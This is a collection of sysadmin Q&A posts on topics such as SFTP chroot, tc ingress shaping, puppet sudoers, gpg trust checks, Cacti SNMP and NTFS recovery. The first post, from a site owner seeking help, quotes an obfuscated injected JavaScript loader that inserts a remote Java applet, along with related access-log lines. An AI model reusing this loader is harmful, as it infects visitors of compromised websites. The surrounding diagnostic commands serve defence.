  • Malware Cross Site Scripting attack / XSS Attack?

    - by user124176
    I have been hit by a Cross Site Scripting / XSS / RFI attack, but I can't find it anywhere in the source of the files, and hashes on the files have not been changed according to the OSSEC HIDS that I run with real-time monitoring on all web dirs. The attack happens on IE9 only; it appends JavaScript code like the below. Notice that it starts after the /html tag closes normally:

      scXXpt language="javascXXpt"
      var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){
          var xew = function(iso) {
              var crh, eaq, i;
              var owb = "";
              crh = iso.length;
              for (i = 0; i < crh; ++i) {
                  eaq = iso.charCodeAt(i)-2;
                  owb = owb + String.fromCharCode(eaq);
              }
              return(owb);
          }
          var janlq=document.createElement(xew("crrngv"));
          janlq.setAttribute(xew("eqfg"), xew(gqumas));
          janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));
          janlq.setAttribute(xew("ykfvj"), "1");
          janlq.setAttribute(xew("jgkijv"), "1");
          var lgtwyi=document.createElement(xew("rctco"));
          lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));
          lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));
          janlq.appendChild(lgtwyi);
          document.body.appendChild(janlq);
      };
      enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73");

    No code has been changed on file, as far as my HIDS says, but I can see the following in my error log:

      File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee

    In the access log, the following:

      IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04"
      IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04"

    Now, the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java class class.class, yet it still looks like a local call to the server, and it was getting a "404 File not found / 504 Gateway Timeout" (the attack was blocked by the local machine, hence the timeout / not found).

    Any idea on how to prevent the attack? I'm working on using HTML Purifier, but it seems that might not be the correct idea, according to some replies I'm getting on their forum :) Kind regards, Steven
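
    If the injected script genuinely isn't in any file, it may be added at serve time (a compromised module, a rogue .htaccess rewrite, or injection between server and client); the IE9-only symptom in particular suggests something keying on the User-Agent. A few hedged checks:

      # Search the web roots for marker strings from the payload
      grep -R -l 'enuwjo' /var/www/vhosts/ 2>/dev/null
      # Recently modified PHP files and .htaccess rules are prime suspects
      find /var/www/vhosts/ -mtime -7 \( -name '.htaccess' -o -name '*.php' \)
      # Fetch the page with an IE-like User-Agent and compare with the file on disk
      curl -A 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)' http://superkids.dk/ | tail -n 30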


  • User can't SFTP after chroot

    - by Dauntless
    Ubuntu 10.04.4 LTS. I'm trying to chroot the user 'sam'. According to all the tutorials out there this should work, but apparently I'm still doing something wrong.

    The user:

      sam:x:1005:1006::/home/sam:/bin/false

    I changed /etc/ssh/sshd_config like this (at the bottom of the file):

      #Subsystem sftp /usr/lib/openssh/sftp-server
      # CHROOT JAIL
      Subsystem sftp internal-sftp
      Match group users
          ChrootDirectory %h
          ForceCommand internal-sftp
          AllowTcpForwarding no

    I added sam to the users group:

      $ groups sam
      sam : sam users

    I changed the permissions for sam's home folder:

      $ ls -la /home/sam
      drwxr-xr-x 11 root root  4096 Sep 23 16:12 .
      drwxr-xr-x  8 root root  4096 Sep 22 16:29 ..
      drwxr-xr-x  2 sam  users 4096 Sep 23 16:10 awstats
      drwxr-xr-x  3 sam  users 4096 Sep 23 16:10 etc
      ...
      drwxr-xr-x  2 sam  users 4096 Sep 23 16:10 homes
      drwxr-x---  3 sam  users 4096 Sep 23 16:10 public_html

    I restarted ssh, and now sam can't log in with SFTP. The session is created but also closed immediately:

      Sep 24 12:55:15 ... sshd[9917]: Accepted password for sam from ...
      Sep 24 12:55:15 ... sshd[9917]: pam_unix(sshd:session): session opened for user sam by (uid=0)
      Sep 24 12:55:16 ... sshd[9928]: subsystem request for sftp
      Sep 24 12:55:17 ... sshd[9917]: pam_unix(sshd:session): session closed for user sam

    Cyberduck says "Unexpected end of sftp stream." and other clients give similar errors. What did I forget / what is going wrong? Thanks!
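
    A hedged debugging step, not from the post: run the client verbosely and raise sshd's logging, since with ChrootDirectory a silently closed session is usually a permissions/ownership problem on some path component, or the forced command failing inside the chroot:

      # Client side: watch exactly where the session dies
      sftp -vvv sam@yourserver
      # Server side: set "LogLevel DEBUG3" in /etc/ssh/sshd_config, restart ssh,
      # then watch the auth log while logging in
      tail -f /var/log/auth.log
      # Every directory from / down to the chroot must be root-owned and not
      # group- or world-writable; namei shows the whole chain at once
      namei -l /home/sam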


  • Ingress filtering in Linux traffic control: Redirect traffic to IFB device

    - by Dani Camps
    I have an OpenWrt router and I want to shape incoming traffic in order to classify all the traffic addressed to a certain IP address in my home network as low priority. For that purpose I want to redirect all traffic incoming on the eth1 interface (the one connected to the DSL modem) to an IFB device, where I will do the shaping. These are the details of my system:

      Linux OpenWrt 2.6.32.27 #7 Fri Jul 15 02:43:34 CEST 2011 mips GNU/Linux

    Here is the script I am using, where the last instruction is failing:

      # Variable definition
      ETH=eth1
      IFB=ifb1
      IP_LP="192.168.1.22/32"
      DL_RATE="900kbps"
      HP_RATE="890kbps"
      LP_RATE="10kbps"
      TC="tc"

      # Configuring the ifbX interface
      insmod ifb
      insmod sch_htb
      insmod sch_ingress
      ifconfig $IFB up

      # Adding the HTB scheduler to the ingress interface
      $TC qdisc add dev $IFB root handle 1: htb default 11

      # Set the maximum bandwidth that each priority class can get, and the maximum borrowing they can do
      $TC class add dev $IFB parent 1:1 classid 1:10 htb rate $LP_RATE ceil $DL_RATE
      $TC class add dev $IFB parent 1:1 classid 1:11 htb rate $HP_RATE ceil $DL_RATE

      # Redirect all ingress traffic arriving at $ETH to $IFB
      $TC qdisc del dev $ETH ingress 2>/dev/null
      $TC qdisc add dev $ETH ingress
      $TC filter add dev $ETH parent ffff: protocol ip prio 1 u32 \
          match u32 0 0 flowid 1:1 \
          action mirred egress redirect dev $IFB

    The last instruction fails with:

      Action 4 device ifb1 ifindex 9
      RTNETLINK answers: No such file or directory
      We have an error talking to the kernel

    Does anyone know what I am doing wrong? Best regards, Daniel
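
    A hedged guess from the error text alone: "No such file or directory" from tc when installing a mirred action is often just a missing kernel module; the script loads ifb, sch_htb and sch_ingress but not the action/classifier modules. Assuming a stock OpenWrt 2.6 build:

      insmod act_mirred   # the "action mirred" part of the filter
      insmod cls_u32      # the u32 classifier
      # then re-run the failing command
      $TC filter add dev $ETH parent ffff: protocol ip prio 1 u32 \
          match u32 0 0 flowid 1:1 \
          action mirred egress redirect dev $IFB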


  • How to generate customized sudoers files in puppet depending on the environment they're deployed to?

    - by gozu
    The sysadmins are present in the sudoers files of all environments, but other sudoers are not. Different environments all have slightly different sudoers files. Most of the time 90% of users are the same and 10% vary, so we cannot have only one sudoers file for everything. Right now we are using Puppet with 10 different files, with names like sudoers.production1, sudoers.production2, sudoers.production3, sudoers.testing1, sudoers.staging1 and so forth. Puppet then picks the file to deploy based on the server's $domain (ex: dbserver.staging1.acme.com) or $hardwaremodel. It works fine, but it's a nightmare to maintain so many files.

    I'd like to autogenerate sudoers files based on the server's domain and have only one big file with all the sudoers permissions for all users and all environments. Something that looks like:

      User_Alias ADMINS = abe, bob, carol, dave
      case $domain {
          "staging1.acme.com" {
              # add dev1, dev2, tester1, tester2 to sudoers file
          }
          "testing2.acme.com" {
              # add tester1, tester3, tester4 to sudoers file
          }
      }

    What's the best way to go about this? Suggestions for alternatives are welcome. I'd appreciate any tips.

    Update 1: For security reasons, we'd rather not concatenate a bunch of files from a folder located on a puppet client, in case someone puts a file in there (maliciously or not) and either breaks the combined file or inserts something into it.

    Most importantly, for usability, we'd like to keep the number of sudoers-related files (fragment or complete) on the puppet server to either 3 (prod/stage/test) or preferably 1 file. This file would (somehow) generate sudoers files on the puppet server and send one customized file to each puppet client. The purpose of this would be that searching for a username and removing it happens in a single file, which is quicker than doing it across 11 files. When adding a user to a bunch of environments it won't be as quick, but only one file would need to be opened and looked at, greatly reducing the chances of an omission.

    Our sudo version is 1.6.9p8, so we can't use a /sudoers.d folder, only a sudoers file.
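
    One pattern that fits the single-file requirement (a sketch only, untested; the group lists and file layout are hypothetical): keep a single ERB template on the puppet master and branch on the client's domain fact inside it, so the generated sudoers differs per environment while admins edit one source file. Depending on the Puppet version, the fact is referenced as @domain or domain:

      # sudoers.erb -- one source template for all environments
      User_Alias ADMINS = abe, bob, carol, dave
      ADMINS ALL=(ALL) ALL
      <% if @domain == "staging1.acme.com" -%>
      User_Alias STAGING = dev1, dev2, tester1, tester2
      STAGING ALL=(ALL) ALL
      <% elsif @domain == "testing2.acme.com" -%>
      User_Alias TESTING = tester1, tester3, tester4
      TESTING ALL=(ALL) ALL
      <% end -%>

    and in the manifest:

      file { "/etc/sudoers":
        owner   => "root",
        group   => "root",
        mode    => "0440",
        content => template("sudoers/sudoers.erb"),
      }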


  • Force Windows Local Subnet Traffic through a Gateway

    - by Beerey
    Hi all. We are attempting to route all traffic from a certain machine through a gateway. This works OK for traffic destined for subnets outside of the machine's subnet. However, traffic to machines in the same subnet as the source machine goes through an On-link gateway in Windows. This means that the default gateway is ignored and traffic within the subnet (for example, 192.168.50.10 to 192.168.50.11) flows directly:

      Destination     Netmask          Gateway    Interface        Metric
      192.168.50.0    255.255.255.0    On-link    192.168.50.214   276

    This route can be deleted from Windows, but when the machine is rebooted it always comes back. Adding a persistent static route to the gateway with a lower metric doesn't work, since it will still try the On-link gateway after the persistent route fails.

      - Putting each machine in a VLAN isn't an option due to the setup we have.
      - Adding a startup script to delete the gateway isn't a great option either, since users will have full admin access to the machine and might disable the script.
      - We cannot transparently intercept all network traffic on the subnet using gratuitous ARPs or transparent proxying, since there are other machines on the subnet which use a different gateway.

    The only way we have gotten it to work is by adding a persistent route to the gateway for the subnet traffic and deleting the On-link route on reboot. The question is then: is there a way to permanently remove this On-link route? If not, is there a way to otherwise force even local subnet traffic to go through a gateway?


  • Validating signature trust with gpg?

    - by larsks
    We would like to use gpg signatures to verify some aspects of our system configuration management tools. Additionally, we would like to use a "trust" model where individual sysadmin keys are signed with a master signing key, and then our systems trust that master key (and use the "web of trust" to validate signatures by our sysadmins). This gives us a lot of flexibility, such as the ability to easily revoke the trust on a key when someone leaves, but we've run into a problem: while the gpg command will tell you if a key is untrusted, it doesn't appear to return an exit code indicating this fact. For example:

      # gpg -v < foo.asc
      Version: GnuPG v1.4.11 (GNU/Linux)
      gpg: armor header:
      gpg: original file name=''
      this is a test
      gpg: Signature made Fri 22 Jul 2011 11:34:02 AM EDT using RSA key ID ABCD00B0
      gpg: using PGP trust model
      gpg: Good signature from "Testing Key <[email protected]>"
      gpg: WARNING: This key is not certified with a trusted signature!
      gpg:          There is no indication that the signature belongs to the owner.
      Primary key fingerprint: ABCD 1234 0527 9D0C 3C4A CAFE BABE DEAD BEEF 00B0
      gpg: binary signature, digest algorithm SHA1

    The part we care about is this:

      gpg: WARNING: This key is not certified with a trusted signature!
      gpg:          There is no indication that the signature belongs to the owner.

    The exit code returned by gpg in this case is 0, despite the trust failure:

      # echo $?
      0

    How do we get gpg to fail in the event that something is signed with an untrusted signature? I've seen some suggestions that the gpgv command will return a proper exit code, but unfortunately gpgv doesn't know how to fetch keys from keyservers. I guess we can parse the status output (using --status-fd) from gpg, but is there a better way?
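
    For what it's worth, here is a minimal sketch of the --status-fd approach mentioned at the end. The GOODSIG and TRUST_* tokens come from GnuPG's doc/DETAILS; which TRUST_* levels to accept is a policy choice:

      #!/bin/sh
      # verify-trusted.sh -- exit 0 only for a good signature from a trusted key
      status=$(gpg --status-fd 1 --verify "$1" 2>/dev/null)
      echo "$status" | grep -q '^\[GNUPG:\] GOODSIG' || exit 1
      echo "$status" | grep -qE '^\[GNUPG:\] TRUST_(FULLY|ULTIMATE)' || exit 1
      exit 0

    Usage: ./verify-trusted.sh foo.asc && echo "signature trusted".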


  • XAMPP - Apache service stops running after a few seconds.

    - by Fábio Antunes
    Hello. I have this big problem with my XAMPP server: for some reason the Apache service stops running a few seconds after it has been started, and I have no idea what the problem is; the error logs don't say much about it:

      [Fri May 07 01:09:32 2010] [notice] Digest: generating secret for digest authentication ...
      [Fri May 07 01:09:32 2010] [notice] Digest: done
      [Fri May 07 01:09:33 2010] [notice] Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 configured -- resuming normal operations
      [Fri May 07 01:09:33 2010] [notice] Server built: Nov 11 2009 14:29:03
      [Fri May 07 01:09:33 2010] [crit] (22)Invalid argument: Parent: Failed to create the child process.
      [Fri May 07 01:09:33 2010] [crit] (OS 6)O identificador é inválido. : master_main: create child process failed. Exiting.
      [Fri May 07 01:09:33 2010] [notice] Parent: Forcing termination of child process 36

    ("O identificador é inválido" (pt_PT) = "The identifier is invalid".)

    Note: no other application is using the Apache port. I have made some changes to the httpd.conf file, but it has worked well for a long time since then:

      - Added some virtual hosts.
      - Enabled Xdebug.

    Has this happened to anyone else who could tell me what the problem is? Thanks for your time.


  • Unreadable corrupted NTFS partition - lost clusters reported

    - by Eduardo Martinez
    Partition Magic is reporting multiple 'bad file record signature' and 'lost clusters' errors on my 250GB Samsung SATA disk (connected via USB on an XP SP3 machine). Unfortunately PM is unable to fix them.

      - PM shows the drive as being NTFS, detects the used space OK and also the drive name. But the PM browser (right click on partition, browse...) won't show anything, as if the disk were empty.
      - Windows Explorer is not even picking up the drive name, and reports 'the file or directory is corrupted and unreadable'.
      - PTDD Partition Table Doctor demo tells me the boot sector is fine, and I can see all the disk content in its browser - but crucially I cannot copy that content over to a new disk (the PTDD browser is pretty arid, to say the least).
      - Also tried photorec-6.11.3 - it actually started to extract files, but wouldn't keep file names or any folder structure (maybe I missed something in the configuration options).
      - Find and Mount - the intellectual scan went well and the only partition on the disk was detected; then I tried to mount it as p: but got this error in Windows Explorer: 'p:\ is not accesible. The media is write protected'. Find and Mount allows you to create an image from the partition, but I don't have a disk big enough at hand. Does anyone know if this would keep the extracted files/folder structure intact?

    I'm starting to think the disk is pretty screwed and my chances to recover this data are slim. Please, someone enlighten me with that marvellous piece of software I am missing :-) Thanks in advance.
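
    On the closing question: a sector-level image preserves the filesystem byte for byte, so anything recoverable from the disk (file names and folder structure included) is equally recoverable from the image. A sketch with GNU ddrescue from a Linux live CD, assuming the USB disk appears as /dev/sdb:

      # Image the partition onto a bigger disk; the log file makes the copy resumable
      ddrescue -r3 /dev/sdb1 /mnt/bigdisk/samsung.img /mnt/bigdisk/samsung.log
      # Point recovery tools (testdisk etc.) at the image, or try a read-only mount
      mount -o loop,ro -t ntfs /mnt/bigdisk/samsung.img /mnt/recovered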


  • Cacti not working for SNMP data sources

    - by lorenzo-s
    I installed the cacti and snmpd packages on a Debian server. I'm able to display common graphs in Cacti (such as memory usage, load average, logged-in users, etc.) using the data templates listed as Unix. Now I want to replace these graphs with new ones using SNMP data sources, because I see there is also CPU usage, and because it's possible I'll have to manage multiple hosts in the future.

    So I installed snmpd on the machine and left snmpd.conf as it is. In Cacti, I created three new data sources from SNMP templates for the 127.0.0.1 host:

      - ucd/net - CPU Usage - Nice
      - ucd/net - CPU Usage - System
      - ucd/net - CPU Usage - User

    Then I created a new graph from the template ucd/net - CPU Usage, and selected the three data sources in the Graph Item Fields section. The graph is now enabled and running, but empty: no data has been collected.

    Under Console - Devices my SNMP host is listed as up and running:

      System: Linux ip-xx-xx-xxx-xxx 3.2.0-23-virtual #36-Ubuntu SMP Tue Apr 10 22:29:03 UTC 2012 x86_64
      Uptime: 929267 (0 days, 2 hours, 34 minutes)
      Hostname: ip-xx-xx-xxx-xxx
      Location: Sitting on the Dock of the Bay
      Contact: Me [email protected]

    In SNMP Options I left everything as it is:

      SNMP Version: Version 1
      SNMP Community: public
      SNMP Timeout: 500 ms
      Maximum OID's Per Get Request: 10

    In Console - Utilities - Cacti Log I have multiple warnings (two for each data source) every 5 minutes:

      10/29/2012 01:45:01 PM - CMDPHP: Poller[0] Host[2] DS[18] WARNING: Result from SNMP not valid. Partial Result: U
      10/29/2012 01:45:01 PM - CMDPHP: Poller[0] WARNING: SNMP Get Timeout for Host:'127.0.0.1', and OID:'.1.3.6.1.4.1.2021.4.15.0'
      10/29/2012 01:45:01 PM - CMDPHP: Poller[0] Host[1] DS[9] WARNING: Result from SNMP not valid. Partial Result: U
      10/29/2012 01:45:01 PM - CMDPHP: Poller[0] WARNING: SNMP Get Timeout for Host:'127.0.0.1', and OID:'.1.3.6.1.4.1.2021.11.52.0'
      10/29/2012 01:40:01 PM - CMDPHP: Poller[0] Host[2] DS[19] WARNING: Result from SNMP not valid. Partial Result: U
      10/29/2012 01:40:01 PM - CMDPHP: Poller[0] WARNING: SNMP Get Timeout for Host:'127.0.0.1', and OID:'.1.3.6.1.4.1.2021.4.6.0'
      [...]

    I have the feeling I'm missing something, but I cannot work out what...
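
    A hedged first check (not from the post): query the failing OIDs by hand. On Debian the stock snmpd.conf often restricts the default community to a small view of the MIB tree, which makes exactly these UCD OIDs (.1.3.6.1.4.1.2021...) time out while sysDescr still answers, so Cacti shows the host as up but collects no CPU data:

      # Does the agent answer at all?
      snmpget -v1 -c public 127.0.0.1 .1.3.6.1.2.1.1.1.0       # sysDescr.0
      # Now one of the OIDs from the Cacti log
      snmpget -v1 -c public 127.0.0.1 .1.3.6.1.4.1.2021.4.15.0
      # If the second times out, widen the view in /etc/snmp/snmpd.conf, e.g.:
      #   rocommunity public 127.0.0.1
      # and restart snmpd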

